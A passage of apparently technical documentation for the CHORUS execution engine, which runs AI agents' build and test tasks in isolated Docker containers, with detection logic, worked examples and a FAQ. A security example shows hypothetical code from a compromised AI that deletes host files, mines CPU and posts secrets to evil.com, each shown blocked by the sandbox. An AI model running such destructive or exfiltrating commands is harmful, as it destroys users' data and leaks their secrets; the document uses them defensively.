/workspace/input && cargo build --release" ``` **Python Script:** ```bash docker run --rm -v $(pwd):/workspace/input:ro \ anthonyrawlins/chorus-python-dev:latest \ bash -c "cd /workspace/input && python3 main.py" ``` **Node.js Application:** ```bash docker run --rm -v $(pwd):/workspace/input:ro \ anthonyrawlins/chorus-node-dev:latest \ bash -c "cd /workspace/input && npm install && npm test" ``` ### Language Detection Algorithm ```go // Priority 1: Explicit (highest confidence) { "context": { "language": "rust" // ← Directly specified } } // Result: chorus-rust-dev // Priority 2: Repository URL patterns { "context": { "repository_url": "github.com/user/my-rust-app" // ← "rust" in name } } // Result: chorus-rust-dev // Priority 3: Description keywords { "description": "Fix compilation error in Cargo.toml" // ← "Cargo.toml" detected } // Result: chorus-rust-dev (high-priority keyword match) // Priority 4: Generic mentions { "description": "Update the rust version" // ← Generic "rust" mention } // Result: chorus-rust-dev (medium-priority match) // Fallback { "description": "Process this JSON file" // ← No language detected } // Result: chorus-base (fallback) ``` ### AI Model Awareness (New in v2.0) AI models now receive image information in their system prompt via **Rule E: Execution Environments**: ```markdown Available Images (Docker Hub: anthonyrawlins/chorus-*): | Language/Stack | Image | Pre-installed Tools | Use When | |----------------|-------|---------------------|----------| | **Rust** | chorus-rust-dev | rustc, cargo, clippy | Rust compilation... | ``` This allows AI to: - Recommend appropriate environments - Explicitly set `context.language` in responses - Explain tool availability to users - Plan multi-step execution with correct images --- ## Real-World Examples ### Example 1: Fix Rust Compilation Error **User Request:** ```json { "task_id": "FIX-001", "description": "Fix the compilation error in src/main.rs", "context": { "repository_url": "https://github.com/user/my-rust-app", "language": "rust" } } ``` **Execution Flow:** ``` 1. Language Detection ├─ Explicit: context.language = "rust" ✅ ├─ Repository: "rust-app" detected ✅ └─ Selected: anthonyrawlins/chorus-rust-dev:latest 2. Sandbox Initialization (850ms) ├─ Pull image (0ms - cached) ├─ Create container (300ms) ├─ Start container (150ms) └─ Configure workspace (400ms) 3. AI Analysis (5s) ├─ Read src/main.rs ├─ Identify error: "unused variable `x`" └─ Generate fix 4. Apply Fix (50ms) ├─ WriteFile(src/main.rs, fixed_content) └─ Verify with syntax check 5. Compile & Test (45s) ├─ Command: cargo build --release ├─ stdout: "Compiling myapp v0.1.0..." ├─ Command: cargo test └─ Exit code: 0 ✅ 6. Collect Artifacts (200ms) ├─ Binary: target/release/myapp (4.2MB) ├─ Test report: target/test-results.xml └─ Coverage: target/coverage.html 7. Cleanup (150ms) ├─ Stop container └─ Remove container Total Time: 51.25 seconds Result: Success ✅ ``` **Resource Usage:** ``` CPU: 1.8 cores average (90% of 2-core limit) Memory: 1.6GB peak (80% of 2GB limit) Disk I/O: 450MB read, 180MB written Network: 0 bytes (isolated) Processes: 12 peak (12% of 100 limit) ``` ### Example 2: Python Data Analysis **User Request:** ```json { "task_id": "ANALYZE-001", "description": "Run pytest on the data analysis pipeline", "context": { "repository_url": "https://github.com/user/data-pipeline" } } ``` **Execution Flow:** ``` 1. Language Detection ├─ Repository: "data-pipeline" (no lang hint) ├─ Description: "pytest" detected ✅ └─ Selected: anthonyrawlins/chorus-python-dev:latest 2. Setup Dependencies (15s) ├─ Command: uv sync ├─ Installs: pandas, numpy, pytest, pytest-cov └─ Cache: /workspace/data/.cache/uv/ 3. Run Tests (8s) ├─ Command: uv run pytest --cov=src --cov-report=html ├─ stdout: "test_pipeline.py::test_transform PASSED" ├─ stdout: "test_pipeline.py::test_analyze PASSED" ├─ Coverage: 94% └─ Exit code: 0 ✅ 4. Artifacts ├─ HTML report: htmlcov/index.html ├─ XML report: coverage.xml └─ Pytest cache: .pytest_cache/ Total Time: 24.8 seconds Result: Success ✅ (94% coverage) ``` ### Example 3: Multi-Language Monorepo **User Request:** ```json { "task_id": "BUILD-001", "description": "Build the frontend and backend", "context": { "repository_url": "https://github.com/user/fullstack-app" } } ``` **Execution Flow (Sequential):** ``` Task 1: Build Backend (Go) ───────────────────────────── 1. Detect: "go.mod" found → go-dev 2. Sandbox: chorus-go-dev container 3. Commands: ├─ go mod download ├─ go build -o backend ./cmd/server └─ go test ./... 4. Result: backend binary (12MB) 5. Cleanup & save artifacts Task 2: Build Frontend (Node.js) ───────────────────────────────── 1. Detect: "package.json" found → node-dev 2. Sandbox: chorus-node-dev container 3. Commands: ├─ npm install ├─ npm run build └─ npm test 4. Result: dist/ folder (8MB) 5. Cleanup & save artifacts Combined Artifacts: ├─ backend (12MB) └─ frontend/dist/ (8MB) Total Time: 89 seconds (parallel: 52s) Result: Success ✅ ``` ### Example 4: Security Scenario - Malicious Code Blocked **Malicious Request (AI compromised or buggy):** ```json { "task_id": "EVIL-001", "description": "Clean up old files", "context": {} } ``` **AI Generates Malicious Code:** ```python # Attempt 1: Delete host files import os os.system("rm -rf /host/important_data") # Attempt 2: Cryptocurrency miner while True: compute_hash() # Infinite CPU loop # Attempt 3: Exfiltrate data import requests requests.post("http://evil.com", data=secrets) ``` **What Actually Happens:** ``` Attempt 1: Delete Host Files ───────────────────────────── Command: rm -rf /host/important_data Result: ❌ Path not found Reason: Mount namespace isolation /host doesn't exist in container Even if it did, read-only root FS prevents deletion Attempt 2: CPU Mining ───────────────────── Command: python3 mine.py Result: ⚠️ Runs but limited Reason: CPU limit = 2 cores (can't consume all host CPU) Timeout = 5 minutes (killed automatically) Host system remains responsive Attempt 3: Network Exfiltration ──────────────────────────────── Command: python3 -c "import requests; requests.post(...)" Result: ❌ Network unreachable Reason: NetworkMode = "none" No network interfaces available Can't resolve DNS or create connections Final Outcome: ✅ Host system completely safe ✅ Container killed after timeout ✅ All attempts logged for audit ✅ No persistent damage ``` --- ## Troubleshooting & FAQ ### Common Issues **1. "Image not found" Error** ```bash Error: Failed to pull image: manifest unknown ``` **Solution:** ```bash # Verify image name docker pull anthonyrawlins/chorus-rust-dev:latest # Check Docker Hub manually # https://hub.docker.com/r/anthonyrawlins/chorus-rust-dev # If still failing, check internet connection ping hub.docker.com ``` **2. Container Startup Timeout** ```bash Error: Context deadline exceeded while starting container ``` **Solution:** ```bash # Check Docker daemon status systemctl status docker # Check system resources docker system df df -h # Clean up old containers/images docker system prune -a # Increase timeout in config timeout: 10 * time.Minute // Default: 5 minutes ``` **3. Out of Memory Errors** ```bash Error: Container killed by OOM killer ``` **Solution:** ```go // Increase memory limit in SandboxConfig Resources: ResourceLimits{ MemoryLimit: 4 * 1024 * 1024 * 1024, // 4GB instead of 2GB } ``` **4. Permission Denied Writing Files** ```bash Error: Permission denied: /workspace/output/myapp ``` **Solution:** ```bash # Container runs as UID 1000 (user: chorus) # Ensure host directories have correct permissions # On host: sudo chown -R 1000:1000 /path/to/workspace/output # Or make world-writable (less secure): chmod 777 /path/to/workspace/output ``` ### FAQ **Q: Can the AI access my files?** A: No. The container has its own isolated filesystem. You explicitly choose which files to mount via `Repository.LocalPath`, and even those are mounted read-only by default. **Q: What if the AI generates malicious code?** A: The security layers prevent damage: - No network access (can't exfiltrate data) - No host file access (can't modify your system) - Resource limits (can't DoS your machine) - Read-only root (can't install malware) - Non-root user (can't escalate privileges) **Q: How much disk space do the images use?** A: Total: ~9GB for all 7 images with layer sharing: - Base layers are shared across images - Only language-specific layers are unique - Example: rust-dev = 643MB base + 1.8GB Rust tools **Q: Can I use custom images?** A: Yes! Specify in `SandboxConfig`: ```go config := &SandboxConfig{ Image: "mycompany/custom-rust:latest", } ``` **Q: What happens if a command hangs forever?** A: Automatic timeout: - Default: 5 minutes per command - Configurable via `Command.Timeout` - Container is forcibly stopped after timeout - Resources are cleaned up automatically **Q: Can containers communicate with each other?** A: No by default (`NetworkMode: "none"`). If needed for multi-service testing, you can configure a custom Docker network, but this should be used cautiously. **Q: How do I debug issues inside the container?** A: Several options: ```go // 1. Keep container alive for manual inspection config.CleanupDelay = 10 * time.Minute // 2. Execute debug commands sandbox.ExecuteCommand(ctx, &Command{ Executable: "ls", Args: []string{"-la", "/workspace/data"}, }) // 3. Read log files logContent, _ := sandbox.ReadFile(ctx, "/workspace/data/build.log") ``` **Q: Performance: Should I pre-pull images?** A: Highly recommended for production: ```bash # On each cluster node docker pull anthonyrawlins/chorus-rust-dev:latest docker pull anthonyrawlins/chorus-go-dev:latest docker pull anthonyrawlins/chorus-python-dev:latest docker pull anthonyrawlins/chorus-node-dev:latest docker pull anthonyrawlins/chorus-java-dev:latest docker pull anthonyrawlins/chorus-cpp-dev:latest docker pull anthonyrawlins/chorus-base:latest ``` This eliminates 30-120s pull time on first use. **Q: Can I run multiple tasks in parallel?** A: Yes! Each task gets its own isolated container: ```go // Safe to run concurrently go engine.ExecuteTask(ctx, rustTask) go engine.ExecuteTask(ctx, pythonTask) go engine.ExecuteTask(ctx, nodeTask) ``` **Q: What's the overhead compared to native execution?** A: Minimal after warmup: - First command: +400-850ms (container startup) - Subsequent commands: +10-15ms per command - Memory: +150MB overhead - CPU: +5% overhead For long-running builds (minutes), overhead is negligible. **Q: How do I update tool versions in images?** A: Images are versioned and immutable. To update: 1. Build new image version (e.g., `chorus-rust-dev:1.1.0`) 2. Push to Docker Hub 3. Update `ImageVersion` constant in `images.go` 4. Old versions remain available for reproducibility --- ## Summary: Why This Approach is Revolutionary ### The Promise CHORUS Task Execution Engine delivers on a critical promise: **AI agents can write, build, test, and execute code safely at scale.** ### Key Innovations 1. **Zero Configuration Security** - No SSH keys, no passwords, no firewall rules - Security by default, not as an afterthought 2. **Multi-Language Support Out-of-the-Box** - 7 pre-configured environments - Automatic detection and selection - Consistent workspace structure 3. **API-First Design** - Direct Docker SDK communication - No subprocess spawning - Structured error handling 4. **Resource Predictability** - Guaranteed CPU, memory, disk limits - No "noisy neighbor" problems - Fair scheduling across tasks 5. **Auditability** - Every command logged - Complete resource tracking - Reproducible execution history ### The Bottom Line Traditional approaches force you to choose between: - **Security** (complex SSH, VMs, permission systems) - **Performance** (native execution, no isolation) - **Simplicity** (manual tool installation, dependency hell) **CHORUS gives you all three.** --- ## References - **Source Code**: `/home/tony/chorus/project-queues/active/CHORUS/pkg/execution/` - **Docker SDK**: https://pkg.go.dev/github.com/docker/docker - **Image Repository**: https://gitea.chorus.services/tony/chorus-dev-images - **Docker Hub**: https://hub.docker.com/r/anthonyrawlins/ - **Security References**: - Linux Namespaces: https://man7.org/linux/man-pages/man7/namespaces.7.html - Seccomp: https://docs.docker.com/engine/security/seccomp/ - AppArmor: https://docs.docker.com/engine/security/apparmor/ --- **Document Version**: 1.0 **Last Updated**: 2025-09-30 **Author**: CHORUS Development Team **Maintained By**: Tony Rawlins (tony@chorus.services)